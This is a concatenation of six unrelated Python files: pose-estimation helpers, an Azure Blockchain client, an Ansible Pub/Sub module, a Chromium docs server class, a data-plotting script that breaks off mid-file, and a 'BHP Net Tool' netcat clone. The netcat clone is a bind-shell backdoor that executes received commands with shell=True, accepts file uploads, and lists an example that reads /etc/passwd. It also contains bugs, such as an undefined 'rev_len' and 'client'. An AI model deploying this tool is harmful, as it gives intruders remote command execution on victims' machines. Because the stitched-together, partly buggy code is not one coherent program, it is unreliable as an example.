Parameters
----------
model : tuple
The model produced by the Hourglass code.
Returns
-------
do : function
The function needed for inference.
"""
func = model[0];
config = model[1];
def runner(imgs):
return func(0, config, 'inference', imgs=torch.Tensor(np.float32(imgs)))['preds']
def do(img, c, s):
ans = inference(img, runner, config, c, s)
if len(ans) > 0:
ans = ans[:,:,:3]
## ans has shape N,16,3 (num preds, joints, x/y/visible)
pred = []
for i in range(ans.shape[0]):
pred.append({'keypoints': ans[i,:,:]})
return pred
return do;
def read_heatmap(fn):
"""
Extracts a heatmap from the given file.
Parameters
----------
fn : str
Path to file containing heatmap.
Returns
-------
dataset : numpy.ndarray
The extracted heatmap.
"""
f = h5py.File(fn,'r');
ds = f['heatmap'];
ds = np.array(ds);
f.close();
ds = np.array(ds);
#Equivilent to the reverse way ML reads data + the permute
ds = np.transpose(ds,(1,2,0))
return ds;
def convert_keypoints(kps,inSize,outSize):
"""
Takes a set of keypoints and adjusts to a new scale.
Parameters
----------
kps : numpy.ndarray
The keypoints to convert.
inSize : TYPE
The size of the original image.
outSize : TYPE
The size of the scaled image.
Returns
-------
conkps : numpy.ndarray
The converted keypoints.
"""
conkps = np.array(kps);
scale = inSize / outSize;
for kp in conkps:
#Scale each point by the scale factor
kp[0] /= scale;
kp[1] /= scale;
#Ensure the points don't go outside the bounds of the image
kp[0] = min(kp[0],outSize - 1);
kp[0] = max(0,kp[0]);
kp[1] = min(kp[1],outSize - 1);
kp[1] = max(0,kp[1]);
kp[0] = int(kp[0]);
kp[1] = int(kp[1]);
return np.array([conkps]);
def gen_heatmaps(kpss,in_size,out_size):
"""
Takes a set of keypoints and generates coresponding heatmaps.
Parameters
----------
kpss : numpy.ndarray
Keypoints for each frame in the sequence in MPII format.
in_size : int
Size of the frame used to generate keypoints (n x n).
out_size : int
Size of the resulting heatmap (m x m).
Returns
-------
hms : list of numpy.ndarray
Heatmaps for each keypoint of each frame.
"""
conKps = [convert_keypoints(kps,in_size,out_size) for kps in kpss];
hmg = dp.GenerateHeatmap(out_size,16);
hms = [hmg(kps) for kps in conKps];
for i,hm in tqdm(enumerate(hms)):
kps = kpss[i];
for j,m in enumerate(hm):
p = kps[j][2];
#if j not in [9,10,11,12,13,14,15]: p = 0;
m *= p;
return hms;
def reload(config,hg_dir):
"""
load or initialize model's parameters by config from config['opt'].continue_exp
config['train']['epoch'] records the epoch num
config['inference']['net'] is the model
"""
opt = config['opt']
if opt.continue_exp:
resume = os.path.join(hg_dir + "\\exp", opt.continue_exp)
resume_file = os.path.join(resume, 'checkpoint.pt')
if os.path.isfile(resume_file):
print("=> loading checkpoint '{}'".format(resume))
checkpoint = torch.load(resume_file)
config['inference']['net'].load_state_dict(checkpoint['state_dict'])
config['train']['optimizer'].load_state_dict(checkpoint['optimizer'])
config['train']['epoch'] = checkpoint['epoch']
print("=> loaded checkpoint '{}' (epoch {})"
.format(resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(resume))
if 'epoch' not in config['train']:
config['train']['epoch'] = 0;
def get_get_kp(cap):
"""
Returns a method for obtaining the keypoints for a single frame.
Parameters
----------
cap : cv2.VideoCapture
A CV2 video capture object.
Returns
-------
gk : function
A function that takes a frame number and returns the keypoints.
"""
model = load_model(cf.hg_dir);
do = get_do(model);
_,frame0 = cap.read();
c,s = ut.calc_cent_scale(frame0);
def gk(f):
_,frame = cap.read();
crop = ut.crop(frame,256,320);
return get_kp(crop,do,c,s);
return gk; |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Optional
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
from ._configuration_async import BlockchainManagementClientConfiguration
from .operations_async import BlockchainMemberOperations
from .operations_async import BlockchainMemberOperationResultOperations
from .operations_async import LocationOperations
from .operations_async import OperationOperations
from .operations_async import SkuOperations
from .operations_async import TransactionNodeOperations
from .. import models
class BlockchainManagementClient(object):
"""REST API for Azure Blockchain Service.
:ivar blockchain_member: BlockchainMemberOperations operations
:vartype blockchain_member: azure.mgmt.blockchain.aio.operations_async.BlockchainMemberOperations
:ivar blockchain_member_operation_result: BlockchainMemberOperationResultOperations operations
:vartype blockchain_member_operation_result: azure.mgmt.blockchain.aio.operations_async.BlockchainMemberOperationResultOperations
:ivar location: LocationOperations operations
:vartype location: azure.mgmt.blockchain.aio.operations_async.LocationOperations
:ivar operation: OperationOperations operations
:vartype operation: azure.mgmt.blockchain.aio.operations_async.OperationOperations
:ivar sku: SkuOperations operations
:vartype sku: azure.mgmt.blockchain.aio.operations_async.SkuOperations
:ivar transaction_node: TransactionNodeOperations operations
:vartype transaction_node: azure.mgmt.blockchain.aio.operations_async.TransactionNodeOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param subscription_id: Gets the subscription Id which uniquely identifies the Microsoft Azure subscription. The subscription ID is part of the URI for every service call.
:type subscription_id: str
:param str base_url: Service URL
"""
def __init__(
self,
credential: "AsyncTokenCredential",
subscription_id: str,
base_url: Optional[str] = None,
**kwargs: Any
) -> None:
if not base_url:
base_url = 'https://management.azure.com'
self._config = BlockchainManagementClientConfiguration(credential, subscription_id, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
self.blockchain_member = BlockchainMemberOperations(
self._client, self._config, self._serialize, self._deserialize)
self.blockchain_member_operation_result = BlockchainMemberOperationResultOperations(
self._client, self._config, self._serialize, self._deserialize)
self.location = LocationOperations(
self._client, self._config, self._serialize, self._deserialize)
self.operation = OperationOperations(
self._client, self._config, self._serialize, self._deserialize)
self.sku = SkuOperations(
self._client, self._config, self._serialize, self._deserialize)
self.transaction_node = TransactionNodeOperations(
self._client, self._config, self._serialize, self._deserialize)
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "BlockchainManagementClient":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
|
# ___ ___ ___ __ _____ ___ __ __ __ __
# / _/ | _ \ | __| / \ |_ _| | __| | _\ | \ \ `v' / ()
#| \__ | v / | _| | /\ | | | | _| | v | | -< `. .'
# \__/ |_|_\ |___| |_||_| |_| |___| |__/ |__/ !_! ()
# ___ __ _____ ___ __ _ _ _ _ ___ _ __
#| _ \ |__`. |_ _| | _ \ / \ | || | | || | / _/ | |/ /
#| v / |_ | | | | v / | // | ____ | >< | `._ _| | \__ | <
#|_|_\ |__.' |_| |_|_\ \__/ |____| |_||_| |_| \__/ |_|\_\
#
#project destiny: kinnda sniffer
#
#
#if you will use this tool for bad things its your falt , I have no responibilty
#about your shit so...("i gave you a hammer, you can break the window with him
#but you can fix almost everything with it, the choise is yours")
import socket
import threading
import sys
import getopt
import subprocess
#Define global variables:
listen = False
Command = False
execute = ""
target = ""
upload_destination = ""
port = 0
#all of the functions:
def usage():
print "BHP Net Tool"
print "CREATED BY R3TR0_H4CK"
print "Usage: netcat.py -t targer_host -p port"
print "-l --listen -listen om [host]:[port] for incoming connections"
print "-e --execute=file_to_run - execute the given file upon receving a connections"
print "-c --command - initialize a command shell"
print "-u --upload=destinition -uopn reciving connection to upload a file and write to [destinition]"
print
print
print "Examples:"
print "netcat.py -t 192.168.0.1 -p 5555 -l -c"
print "netcat.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"
print 'netcat.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\"'
sys.exit(0)
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1:]):
usage()
try:
opts , args = getopt.getopt(sys.argv[1:], "hel:t:p:cu" , ["help" , "listen" , "execute" , "target" , "port" , "command" , "upload"])
except getopt.GetoptError as err:
print str(err)
usage()
for o,a in opts:
if o in ("-h" , "--help"):
usage()
elif o in ("-l" , "--listen"):
listen = True
elif o in ("-e" , "--execute"):
execute = a
elif o in ("-u" , "--upload"):
upload_destination = a
elif o in ("-t" , "--target"):
target = a
elif o in ("-p" , "--port"):
port = int(a)
else:
assert False, "Unhandled Option"
if not listen and len(target) and port >0:
#read in the buffer from the commandline
#to stdin
buffer = sys.stdin.read()
#send data off
client_sender(buffer)
#all options commands:
if listen:
server_loop()
def client_sender(buffer):
#setting up the socket:
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
#connecting to the target:
client.connect((target , port))
if len(buffer):
client.send(buffer)
while True:
#wait for data:
recv_len = 1
response = ""
while recv_len:
data = client.recv(4096)
recv_len = len(data)
response += data
if rev_len<4096:
break
print response
#wait for more
buffer = raw_input("")
buffer += "\n"
#send it off
client.send(buffer)
except:
print "[*] Exception! Exiting."
#disconnect
client.close()
def server_loop():
global target
#if target is not define:
if not len(target):
target = "0.0.0.0"
server = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
server.bind((target , port))
server.listen(5)
while True:
client_socket, addr = server.accept()
#spin off a thread to handle our new client:
client_thread = threading.Thread(target=client_handler , args=(client_socket,))
client_thread.start()
def run_command(command):
#train the newline:
command = command.rstrip()
#run the command and get output:
try:
output = subprocess.check_output(command , stderr=subprocess.STDOUT , shell = True)
except:
output = "Command Cant Be Executed..."
return output
def client_handler(client_socket):
global upload
global execute
global command
#check if need to upload:
if len(upload_destination):
#read all the byte and write them to the destination:
file_buffer = ""
#will keep read while there is data:
while True:
data = client_socket.recv(1024)
if not data:
break
else:
file_buffer += data
#write the data to file
try:
file_descriptor = open(upload_destination, "wb")
file_descriptor.write(file_buffer)
file_descriptor.close()
#write thats everything went right:
client_socket.send("Successfully Saved file to %s\r\n" %upload_destination)
except:
client_socket.send("Failed to save file to %s\r\n" %upload_destination)
if len(execute):
#run the command:
output = run_command(execute)
client_socket.send(output)
if command:
while True:
#show a simple prompt:
client.send("<BHP:#> ")
cmd_buffer = ""
while "\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024)
#send back the command output:
response = run_command(cmd_buffer)
#Send to client:
client_socket.send(response)
#calls the main function:
main()
|
#!/usr/bin/python
# Copyright 2016 Google Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gcpubsub
version_added: "2.3"
short_description: Create and Delete Topics/Subscriptions, Publish and pull messages on PubSub.
description:
- Create and Delete Topics/Subscriptions, Publish and pull messages on PubSub.
See U(https://cloud.google.com/pubsub/docs) for an overview.
requirements:
- "python >= 2.6"
- "google-auth >= 0.5.0"
- "google-cloud-pubsub >= 0.22.0"
notes:
- Subscription pull happens before publish. You cannot publish and pull in the same task.
author:
- "<NAME> (@supertom) <<EMAIL>>"
options:
topic:
description:
- GCP pubsub topic name. Only the name, not the full path, is required.
required: True
subscription:
description:
- Dictionary containing a subscripton name associated with a topic (required), along with optional ack_deadline, push_endpoint and pull.
For pulling from a subscription, message_ack (bool), max_messages (int) and return_immediate are available as subfields.
See subfields name, push_endpoint and ack_deadline for more information.
required: False
name:
description: Subfield of subscription. Required if subscription is specified. See examples.
required: False
ack_deadline:
description: Subfield of subscription. Not required. Default deadline for subscriptions to ACK the message before it is resent. See examples.
required: False
pull:
description:
- Subfield of subscription. Not required. If specified, messages will be retrieved from topic via the provided subscription name.
max_messages (int; default None; max number of messages to pull), message_ack (bool; default False; acknowledge the message) and return_immediately
(bool; default True, don't wait for messages to appear). If the messages are acknowledged, changed is set to True, otherwise, changed is False.
push_endpoint:
description:
- Subfield of subscription. Not required. If specified, message will be sent to an endpoint.
See U(https://cloud.google.com/pubsub/docs/advanced#push_endpoints) for more information.
required: False
publish:
description:
- List of dictionaries describing messages and attributes to be published. Dictionary is in message(str):attributes(dict) format.
Only message is required.
required: False
state:
description:
- State of the topic or queue (absent, present). Applies to the most granular resource. Remove the most granular resource. If subcription is
specified we remove it. If only topic is specified, that is what is removed. Note that a topic can be removed without first removing the
subscription.
required: False
default: "present"
'''
EXAMPLES = '''
# Create a topic and publish a message to it
# (Message will be pushed; there is no check to see if the message was pushed before
# Topics:
## Create Topic
gcpubsub:
topic: ansible-topic-example
state: present
## Delete Topic
### Subscriptions associated with topic are not deleted.
gcpubsub:
topic: ansible-topic-example
state: absent
## Messages: publish multiple messages, with attributes (key:value available with the message)
### setting absent will keep the messages from being sent
gcpubsub:
topic: "{{ topic_name }}"
state: present
publish:
- message: "this is message 1"
attributes:
mykey1: myvalue
mykey2: myvalu2
mykey3: myvalue3
- message: "this is message 2"
attributes:
server: prod
sla: "99.9999"
owner: fred
# Subscriptions
## Create Subscription (pull)
gcpubsub:
topic: ansible-topic-example
subscription:
- name: mysub
state: present
## Create Subscription with ack_deadline and push endpoint
### pull is default, ack_deadline is not required
gcpubsub:
topic: ansible-topic-example
subscription:
- name: mysub
ack_deadline: "60"
push_endpoint: http://pushendpoint.example.com
state: present
## Subscription change from push to pull
### setting push_endpoint to "None" converts subscription to pull.
gcpubsub:
topic: ansible-topic-example
subscription:
name: mysub
push_endpoint: "None"
## Delete subscription
### Topic will not be deleted
gcpubsub:
topic: ansible-topic-example
subscription:
- name: mysub
state: absent
## Pull messages from subscription
### only pull keyword is required.
gcpubsub:
topic: ansible-topic-example
subscription:
name: ansible-topic-example-sub
pull:
message_ack: yes
max_messages: "100"
'''
RETURN = '''
publish:
description: List of dictionaries describing messages and attributes to be published. Dictionary is in message(str):attributes(dict) format.
Only message is required.
returned: Only when specified
type: list
sample: "publish: ['message': 'my message', attributes: {'key1': 'value1'}]"
pulled_messages:
description: list of dictionaries containing message info. Fields are ack_id, attributes, data, message_id.
returned: Only when subscription.pull is specified
type: list
sample: [{ "ack_id": "XkASTCcYREl...","attributes": {"key1": "val1",...}, "data": "this is message 1", "message_id": "49107464153705"},..]
state:
description: The state of the topic or subscription. Value will be either 'absent' or 'present'.
returned: Always
type: str
sample: "present"
subscription:
description: Name of subscription.
returned: When subscription fields are specified
type: str
sample: "mysubscription"
topic:
description: Name of topic.
returned: Always
type: str
sample: "mytopic"
'''
CLOUD_CLIENT = 'google-cloud-pubsub'
CLOUD_CLIENT_MINIMUM_VERSION = '0.22.0'
CLOUD_CLIENT_USER_AGENT = 'ansible-pubsub-0.1'
try:
from ast import literal_eval
HAS_PYTHON26 = True
except ImportError:
HAS_PYTHON26 = False
try:
from google.cloud import pubsub
HAS_GOOGLE_CLOUD_PUBSUB = True
except ImportError as e:
HAS_GOOGLE_CLOUD_PUBSUB = False
def publish_messages(message_list, topic):
with topic.batch() as batch:
for message in message_list:
msg = message['message']
attrs = {}
if 'attributes' in message:
attrs = message['attributes']
batch.publish(bytes(msg), **attrs)
return True
def pull_messages(pull_params, sub):
"""
:rtype: tuple (output, changed)
"""
changed = False
max_messages=pull_params.get('max_messages', None)
message_ack = pull_params.get('message_ack', 'no')
return_immediately = pull_params.get('return_immediately', False)
output= []
pulled = sub.pull(return_immediately=return_immediately,
max_messages=max_messages)
for ack_id, msg in pulled:
msg_dict = {'message_id': msg.message_id,
'attributes': msg.attributes,
'data': msg.data,
'ack_id': ack_id }
output.append(msg_dict)
if message_ack:
ack_ids = [m['ack_id'] for m in output]
if ack_ids:
sub.acknowledge(ack_ids)
changed = True
return (output, changed)
def main():
module = AnsibleModule(argument_spec=dict(
topic=dict(required=True),
state=dict(choices=['absent', 'present'], default='present'),
publish=dict(type='list', default=None),
subscription=dict(type='dict', default=None),
service_account_email=dict(),
credentials_file=dict(),
project_id=dict(), ),)
if not HAS_PYTHON26:
module.fail_json(
msg="GCE module requires python's 'ast' module, python v2.6+")
if not HAS_GOOGLE_CLOUD_PUBSUB:
module.fail_json(msg="Please install google-cloud-pubsub library.")
if not check_min_pkg_version(CLOUD_CLIENT, CLOUD_CLIENT_MINIMUM_VERSION):
module.fail_json(msg="Please install %s client version %s" % (CLOUD_CLIENT, CLOUD_CLIENT_MINIMUM_VERSION))
mod_params = {}
mod_params['publish'] = module.params.get('publish')
mod_params['state'] = module.params.get('state')
mod_params['topic'] = module.params.get('topic')
mod_params['subscription'] = module.params.get('subscription')
creds, params = get_google_cloud_credentials(module)
pubsub_client = pubsub.Client(project=params['project_id'], credentials=creds, use_gax=False)
pubsub_client.user_agent = CLOUD_CLIENT_USER_AGENT
changed = False
json_output = {}
t = None
if mod_params['topic']:
t = pubsub_client.topic(mod_params['topic'])
s = None
if mod_params['subscription']:
# Note: default ack deadline cannot be changed without deleting/recreating subscription
s = t.subscription(mod_params['subscription']['name'],
ack_deadline=mod_params['subscription'].get('ack_deadline', None),
push_endpoint=mod_params['subscription'].get('push_endpoint', None))
if mod_params['state'] == 'absent':
# Remove the most granular resource. If subcription is specified
# we remove it. If only topic is specified, that is what is removed.
# Note that a topic can be removed without first removing the subscription.
# TODO(supertom): Enhancement: Provide an option to only delete a topic
# if there are no subscriptions associated with it (which the API does not support).
if s is not None:
if s.exists():
s.delete()
changed = True
else:
if t.exists():
t.delete()
changed = True
elif mod_params['state'] == 'present':
if not t.exists():
t.create()
changed = True
if s:
if not s.exists():
s.create()
s.reload()
changed = True
else:
# Subscription operations
# TODO(supertom): if more 'update' operations arise, turn this into a function.
s.reload()
push_endpoint=mod_params['subscription'].get('push_endpoint', None)
if push_endpoint is not None:
if push_endpoint != s.push_endpoint:
if push_endpoint == 'None':
push_endpoint = None
s.modify_push_configuration(push_endpoint=push_endpoint)
s.reload()
changed = push_endpoint == s.push_endpoint
if 'pull' in mod_params['subscription']:
if s.push_endpoint is not None:
module.fail_json(msg="Cannot pull messages, push_endpoint is configured.")
(json_output['pulled_messages'], changed) = pull_messages(
mod_params['subscription']['pull'], s)
# publish messages to the topic
if mod_params['publish'] and len(mod_params['publish']) > 0:
changed = publish_messages(mod_params['publish'], t)
json_output['changed'] = changed
json_output.update(mod_params)
module.exit_json(**json_output)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.gcp import *
if __name__ == '__main__':
main()
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from fnmatch import fnmatch
import logging
import mimetypes
import traceback
import os
from api_data_source import APIDataSource
from api_list_data_source import APIListDataSource
from appengine_url_fetcher import AppEngineUrlFetcher
from appengine_wrappers import GetAppVersion, IsDevServer
from branch_utility import BranchUtility
from caching_file_system import CachingFileSystem
from compiled_file_system import CompiledFileSystem
from empty_dir_file_system import EmptyDirFileSystem
from example_zipper import ExampleZipper
from file_system import FileNotFoundError
from github_file_system import GithubFileSystem
from intro_data_source import IntroDataSource
from local_file_system import LocalFileSystem
from object_store_creator import ObjectStoreCreator
from offline_file_system import OfflineFileSystem
from path_canonicalizer import PathCanonicalizer
from reference_resolver import ReferenceResolver
from samples_data_source import SamplesDataSource
from sidenav_data_source import SidenavDataSource
from subversion_file_system import SubversionFileSystem
import svn_constants
from template_data_source import TemplateDataSource
from test_object_store import TestObjectStore
from third_party.json_schema_compiler.model import UnixName
import url_constants
class ServerInstance(object):
def __init__(self,
channel,
object_store_creator,
host_file_system,
app_samples_file_system,
static_path,
compiled_fs_factory):
self.channel = channel
self.object_store_creator = object_store_creator
self.host_file_system = host_file_system
self.app_samples_file_system = app_samples_file_system
self.compiled_host_fs_factory = compiled_fs_factory
self.api_list_data_source_factory = APIListDataSource.Factory(
self.compiled_host_fs_factory,
svn_constants.API_PATH,
svn_constants.PUBLIC_TEMPLATE_PATH)
self.api_data_source_factory = APIDataSource.Factory(
self.compiled_host_fs_factory,
svn_constants.API_PATH)
self.ref_resolver_factory = ReferenceResolver.Factory(
self.api_data_source_factory,
self.api_list_data_source_factory,
object_store_creator)
self.api_data_source_factory.SetReferenceResolverFactory(
self.ref_resolver_factory)
# Note: samples are super slow in the dev server because it doesn't support
# async fetch, so disable them.
if IsDevServer():
extension_samples_fs = EmptyDirFileSystem()
else:
extension_samples_fs = self.host_file_system
self.samples_data_source_factory = SamplesDataSource.Factory(
channel,
extension_samples_fs,
CompiledFileSystem.Factory(extension_samples_fs, object_store_creator),
self.app_samples_file_system,
CompiledFileSystem.Factory(self.app_samples_file_system,
object_store_creator),
self.ref_resolver_factory,
svn_constants.EXAMPLES_PATH)
self.api_data_source_factory.SetSamplesDataSourceFactory(
self.samples_data_source_factory)
self.intro_data_source_factory = IntroDataSource.Factory(
self.compiled_host_fs_factory,
self.ref_resolver_factory,
[svn_constants.INTRO_PATH, svn_constants.ARTICLE_PATH])
self.sidenav_data_source_factory = SidenavDataSource.Factory(
self.compiled_host_fs_factory,
svn_constants.JSON_PATH)
self.template_data_source_factory = TemplateDataSource.Factory(
channel,
self.api_data_source_factory,
self.api_list_data_source_factory,
self.intro_data_source_factory,
self.samples_data_source_factory,
self.sidenav_data_source_factory,
self.compiled_host_fs_factory,
self.ref_resolver_factory,
svn_constants.PUBLIC_TEMPLATE_PATH,
svn_constants.PRIVATE_TEMPLATE_PATH,
static_path)
self.example_zipper = ExampleZipper(
self.compiled_host_fs_factory,
svn_constants.DOCS_PATH)
self.path_canonicalizer = PathCanonicalizer(
channel,
self.compiled_host_fs_factory)
self.content_cache = self.compiled_host_fs_factory.CreateIdentity(
ServerInstance)
@staticmethod
def ForTest(file_system):
object_store_creator = ObjectStoreCreator.ForTest()
return ServerInstance('test',
object_store_creator,
file_system,
EmptyDirFileSystem(),
'/static',
CompiledFileSystem.Factory(file_system,
object_store_creator))
@staticmethod
def ForLocal():
channel = 'trunk'
object_store_creator = ObjectStoreCreator(channel,
start_empty=False,
store_type=TestObjectStore)
file_system = CachingFileSystem(LocalFileSystem.Create(),
object_store_creator)
return ServerInstance(
channel,
object_store_creator,
file_system,
EmptyDirFileSystem(),
'/static',
CompiledFileSystem.Factory(file_system, object_store_creator))
|
import os
import glob
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib as mpl
import matplotlib.pyplot as plt
mpl.rcParams['font.family'] = "sans-serif"
mpl.rcParams['font.sans-serif'] = "Arial"
import modules.read_process_data as data_reader
import modules.plot_heatmap as heatmap_maker
import modules.plot_scatterplots as scatterplot_maker
def avg_aggregation(dataset, task_name, file_paths, all_lookup):
all_metrics = []
for filepath in file_paths:
basename = os.path.basename(filepath)
metrics_df = data_reader.read_process_csv(filepath, timeall=all_lookup['timeall'],
lonall=all_lookup['lonall'], latall=all_lookup['latall'],
sort_by='lonlat')
metrics_df["path_name"] = basename
all_metrics.append(metrics_df)
all_metrics_df = pd.concat(all_metrics)
df_list = []
for group_key, df_i in all_metrics_df.groupby("time x lon x lat"):
avg_df = df_i.mean()
df_list.append(avg_df)
mean_df = pd.DataFrame(df_list)
# Put back the string columns to sort
# Add product column for latxlon
mean_df['lon x lat'] = [f'{int(lon)}x{int(lat)}' for lon, lat in zip(mean_df.lon_chunks, mean_df.lat_chunks)]
mean_df['lonlat_product'] = [lon*lat for lon, lat in zip(mean_df.lon_chunks, mean_df.lat_chunks)]
# Sort
mean_df = mean_df.sort_values(by='lonlat_product')
mean_df.time_chunks = mean_df.time_chunks.astype(int)
mean_df.to_csv(f'../data/{dataset}/performance_data/{task_name}.csv')
return mean_df
def make_heatmap(
dataset,
titles_dict,
filepath,
all_lookup,
KEY,
metrics_df=None,
metrics_df_2=None,
task_name=None,
TRANSPOSE=False,
VMIN=None,
VMAX=None,
QUANTILE_Q=0.65,
NUM_DECIMALS=3,
MB_TO_GB=True,
SHOW_TITLE=True,
PROCESS_CSV=True,
PRODUCT=False
):
if PROCESS_CSV:
metrics_df = data_reader.read_process_csv(
filepath,
timeall=all_lookup['timeall'],
lonall=all_lookup['lonall'],
latall=all_lookup['latall'],
sort_by='lonlat'
)
task_name = '_'.join(filepath.split('/')[-1].split('.')[0].split('_')[:-1])
results = heatmap_maker.make_pivot_tables(
metrics_df_1=metrics_df,
metrics_df_2=metrics_df_2,
column_name=KEY,
convert_mb_to_gb=MB_TO_GB,
product=PRODUCT
)
sns.set(font_scale=1.5)
heatmap_maker.make_heatmap(
dataset,
titles_dict,
results,
KEY,
task_name,
transpose=TRANSPOSE,
vmin=VMIN,
vmax=VMAX,
quantile_q=QUANTILE_Q,
fontsize=10,
num_decimals=NUM_DECIMALS,
convert_mb_to_gb=MB_TO_GB,
show_title=SHOW_TITLE
)
def organize_df(df):
df['time_chunks'] = df['time_chunks'].astype(int)
df['lon_chunks'] = df['lon_chunks'].astype(int)
df['lat_chunks'] = df['lat_chunks'].astype(int)
# Add product column for latxlon
df['lon x lat'] = [f'{lon}x{lat}' for lon, lat in zip(df.lon_chunks, df.lat_chunks)]
df['lonlat_product'] = [lon*lat for lon, lat in zip(df.lon_chunks, df.lat_chunks)]
# Another column of timexlatxlon
df['time x lon x lat'] = [f'{time}x{lon}x{lat}' for time, lon, lat in zip(df.time_chunks, df.lon_chunks, df.lat_chunks)]
df['total_product'] = [lon*lat*time for time, lon, lat in zip(df.time_chunks, df.lon_chunks, df.lat_chunks)]
df = df.sort_values(by='lonlat_product')
df.drop_duplicates(subset='time x lon x lat', keep='first', inplace=True)
return df
def main():
ntrials = 1
dataset = 'geos-fp-global_inst'
# Lookup dictionaries
titles_dict = {
"chunk_sizes": "Chunk size [B]",
"num_chunks": "Number of chunks",
"peak_memories": "Peak memory [GB]",
"cpu_times": "CPU time [Sec]",
"norm_cpu_times": "Processing speed [Num data points per sec]",
"norm_peak_memories": "Peak memory per data point [MiB]",
"runtime_hr": "Rechunking time [Hr]",
"archive_size": "Archive size [GB]"
}
convert_all_dict = {
'geos-fp-global_inst': {'timeall': 5136, 'lonall': 1152, 'latall': 721}
}
all_lookup = convert_all_dict[dataset]
task_dict = {
0: f'time_series_metrics_ntrials{ntrials}',
1: f'map_one_timestep_metrics_ntrials{ntrials}'
}
keys = ['norm_cpu_times', 'norm_peak_memories', 'cpu_times', 'peak_memories']
pairwise_combinations = [
('chunk_sizes', 'cpu_times'),
('chunk_sizes', 'peak_memories'),
('peak_memories', 'cpu_times'),
]
norm_pairwise_combinations = [
('chunk_sizes', 'norm_cpu_times'),
('chunk_sizes', 'norm_peak_memories'),
('norm_peak_memories', 'norm_cpu_times'),
]
# Plot time series data
print('Plotting time series data...')
filepath = f'../data/{dataset}/performance_data/{task_dict[0]}.csv'
for k in keys:
make_heatmap(
dataset,
titles_dict,
filepath,
all_lookup,
KEY=k
)
# Plot map data
print('Plotting map data...')
filepath = f'../data/{dataset}/performance_data/{task_dict[1]}.csv'
for k in keys:
make_heatmap(
dataset,
titles_dict,
filepath,
all_lookup,
KEY=k
)
# Plot product/avg of both operations' data
print('Plotting product of both operations...')
# Product of time series and map df's
time_filepath = f'../data/{dataset}/performance_data/{task_dict[0]}.csv'
map_filepath = f'../data/{dataset}/performance_data/{task_dict[1]}.csv'
time_metrics_df = data_reader.read_process_csv(time_filepath, timeall=all_lookup['timeall'],
lonall=all_lookup['lonall'], latall=all_lookup['latall'],
sort_by='lonlat')
map_metrics_df = data_reader.read_process_csv(map_filepath, timeall=all_lookup['timeall'],
lonall=all_lookup['lonall'], latall=all_lookup['latall'],
sort_by='lonlat')
for k in keys:
make_heatmap(
dataset,
titles_dict,
time_filepath,
all_lookup,
KEY=k,
metrics_df=time_metrics_df,
metrics_df_2=map_metrics_df,
task_name='average' if 'norm' in k else 'product',
PROCESS_CSV=False,
PRODUCT=False if 'norm' in k else True
)
# Plot time series aggregation data
print('Plotting time series aggregation data...')
file_paths = np.sort(glob.glob(f'../data/{dataset}/performance_data/time_series_over_region_*_ntrials{ntrials}.*'))
task_name = 'time_series_average'
mean_df = avg_aggregation(dataset, task_name, file_paths, all_lookup)
for k in keys:
make_heatmap(
dataset,
titles_dict,
'',
all_lookup,
KEY=k,
metrics_df=mean_df,
task_name=task_name,
QUANTILE_Q=0.7,
NUM_DECIMALS=3,
PROCESS_CSV=False
)
# Plot map aggregation data
print('Plotting map aggregation data...')
file_paths = np.sort(glob.glob(f'../data/{dataset}/performance_data/map_over_time_*_ntrials{ntrials}.*'))
task_name = 'maps_average'
mean_df = avg_aggregation(dataset, task_name, file_paths, all_lookup)
for k in keys:
make_heatmap(
dataset,
titles_dict,
'',
all_lookup,
KEY=k,
metrics_df=mean_df,
task_name=task_name,
QUANTILE_Q=0.7,
NUM_DECIMALS=3,
PROCESS_CSV=False
)
# Plot product/avg of both operations' data aggregations
print('Plotting product of both aggregation operations...')
# Product of time series and map df's
time_filepath = f'../data/{dataset}/performance_data/time_series_average.csv'
map_filepath = f'../data/{dataset}/performance_data/maps_average.csv'
time_metrics_df = data_reader.read_process_csv(time_filepath, timeall=all_lookup['timeall'],
lonall=all_lookup['lonall'], latall=all_lookup['latall'],
sort_by='lonlat')
map_metrics_df = data_reader.read_process_csv(map_filepath, timeall=all_lookup['timeall'],
lonall=all_lookup['lonall'], latall=all_lookup['latall'],
sort_by='lonlat')
for k in keys:
make_heatmap(
dataset,
titles_dict,
time_filepath,
all_lookup,
KEY=k,
metrics_df=time_metrics_df,
metrics_df_2=map_metrics_df,
task_name='average_aggregate' if 'norm' in k else 'product_aggregate',
PROCESS_CSV=False,
PRODUCT=False if 'norm' in k else True
)
# Plot rechunking time
